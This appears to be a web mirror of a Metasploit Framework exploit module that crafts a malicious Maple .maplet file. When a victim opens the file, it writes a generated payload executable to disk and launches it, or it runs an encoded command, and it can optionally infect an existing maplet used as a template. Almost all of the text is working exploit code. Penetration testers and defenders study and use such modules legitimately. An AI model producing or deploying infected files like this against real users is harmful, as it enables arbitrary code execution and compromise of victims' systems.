Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/fileformat/maple_maplet.rb
24400 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Maple Maplet File Creation and Command Execution',

17
        'Description' => %q{

18
          This module harnesses Maple's ability to create files and execute commands

19
          automatically when opening a Maplet. All versions up to 13 are suspected

20
          vulnerable. Testing was conducted with version 13 on Windows. Standard security

21
          settings prevent code from running in a normal maple worksheet without user

22
          interaction, but those setting do not prevent code in a Maplet from running.

23


24
          In order for the payload to be executed, an attacker must convince someone to

25
          open a specially modified .maplet file with Maple. By doing so, an attacker can

26
          execute arbitrary code as the victim user.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'scriptjunkie'

31
        ],

32
        'References' => [

33
          [ 'CVE', '2010-20120' ],

34
          [ 'OSVDB', '64541'],

35
          [ 'URL', 'http://www.maplesoft.com/products/maple/' ]

36
        ],

37
        'Payload' => {

38
          'Space' => 1024,

39
          'BadChars' => '',

40
          'DisableNops' => true,

41
          #					'Compat'      =>

42
          #						{

43
          #							'PayloadType' => 'cmd',

44
          #							'RequiredCmd' => 'generic perl telnet',

45
          #						}

46
        },

47
        'Platform' => %w{win linux unix},

48
        'Targets' => [

49
          [

50
            'Windows',

51
            {

52
              'Arch' => ARCH_X86,

53
              'Platform' => 'win'

54
            }

55
          ],

56


57
          [

58
            'Windows X64',

59
            {

60
              'Arch' => ARCH_X64,

61
              'Platform' => 'win'

62
            }

63
          ],

64


65
          [

66
            'Linux',

67
            {

68
              'Arch' => ARCH_X86,

69
              'Platform' => 'linux'

70
            }

71
          ],

72


73
          [

74
            'Linux X64',

75
            {

76
              'Arch' => ARCH_X64,

77
              'Platform' => 'linux'

78
            }

79
          ],

80


81
          [

82
            'Universal CMD',

83
            {

84
              'Arch' => ARCH_CMD,

85
              'Platform' => %w{linux unix win}

86
            }

87
          ]

88


89
        ],

90
        'DisclosureDate' => '2010-04-26',

91
        'DefaultTarget' => 0,

92
        'Notes' => {

93
          'Reliability' => UNKNOWN_RELIABILITY,

94
          'Stability' => UNKNOWN_STABILITY,

95
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

96
        }

97
      )

98
    )

99


100
    register_options(

101
      [

102
        OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),

103
        OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),

104
      ]

105
    )

106
  end

107


108
  def exploit

109
    cmd = ''

110
    content = ''

111
    if target['Arch'] != ARCH_CMD

112
      # Get payload as executable on whatever platform

113
      binary = generate_payload_exe

114


115
      # Get filename and random variable name for file handle in script

116
      fname = rand_text_alpha(3 + rand(15))

117
      if target['Platform'] == 'win'

118
        fname << ".exe"

119
      end

120
      fhandle = rand_text_alpha(3 + rand(15))

121


122
      # Write maple commands to create executable

123
      content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"

124
      exe = binary.unpack('C*')

125


126
      content << "writebytes(#{fhandle},[#{exe[0]}"

127
      lines = []

128
      1.upto(exe.length - 1) do |byte|

129
        if (byte % 100 == 0)

130
          lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"

131
        else

132
          lines.push ",#{exe[byte]}"

133
        end

134
      end

135
      content << lines.join("") + "]);\r\n"

136


137
      content << "fclose(" + fhandle + ");\n"

138
      # Write command to be executed

139
      if target['Platform'] != 'win'

140
        content << "system(\"chmod a+x #{fname}\");\n"

141
      end

142
      content << "system[launch](\"#{fname}\");\n"

143
    else

144
      content << "system(\"#{payload.encoded}\");\n"

145
    end

146


147
    # Then put the rest of the original maplet

148
    if datastore['TEMPLATE'] != ''

149
      File.open(datastore['TEMPLATE'], 'rb') do |fd|

150
        content << fd.read(File.size(datastore['TEMPLATE']))

151
      end

152
    end

153


154
    # Create the file

155
    print_status("Creating '#{datastore['FILENAME']}' file...")

156
    file_create(content)

157
  end

158
end

159


160